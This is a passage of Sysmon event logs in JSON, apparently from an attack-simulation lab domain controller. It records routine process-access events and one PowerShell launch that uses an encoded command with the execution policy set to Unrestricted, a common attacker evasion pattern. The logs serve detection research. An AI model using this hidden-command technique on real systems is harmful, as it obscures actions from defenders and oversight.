06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2707,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.427\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.427","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2708,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.427\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.427","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2709,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.427\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.427","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2710,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.427\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.427","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2711,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.427\r\nSourceProcessGUID: {E2A3D6B1-1090-5F25-0000-001046CB0400}\r\nSourceProcessId: 4832\r\nSourceThreadId: 4852\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1090-5F25-0000-001094CD0400}\r\nTargetProcessId: 4896\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.427","SourceProcessGUID":"{E2A3D6B1-1090-5F25-0000-001046CB0400}","SourceProcessId":"4832","SourceThreadId":"4852","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1090-5F25-0000-001094CD0400}","TargetProcessId":"4896","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2712,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.432\r\nProcessGuid: {E2A3D6B1-1090-5F25-0000-00105FCE0400}\r\nProcessId: 4908\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-1090-5F25-0000-002096CA0400}\r\nLogonId: 0x4CA96\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {E2A3D6B1-1090-5F25-0000-001094CD0400}\r\nParentProcessId: 4896\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.432","ProcessGuid":"{E2A3D6B1-1090-5F25-0000-00105FCE0400}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-1090-5F25-0000-002096CA0400}","LogonId":"0x4ca96","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{E2A3D6B1-1090-5F25-0000-001094CD0400}","ParentProcessId":"4896","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2713,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.427\r\nSourceProcessGUID: {E2A3D6B1-1090-5F25-0000-001094CD0400}\r\nSourceProcessId: 4896\r\nSourceThreadId: 4900\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-1090-5F25-0000-00105FCE0400}\r\nTargetProcessId: 4908\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.427","SourceProcessGUID":"{E2A3D6B1-1090-5F25-0000-001094CD0400}","SourceProcessId":"4896","SourceThreadId":"4900","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-1090-5F25-0000-00105FCE0400}","TargetProcessId":"4908","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2714,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.427\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1090-5F25-0000-00105FCE0400}\r\nTargetProcessId: 4908\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.427","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1090-5F25-0000-00105FCE0400}","TargetProcessId":"4908","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2715,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.427\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.427","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
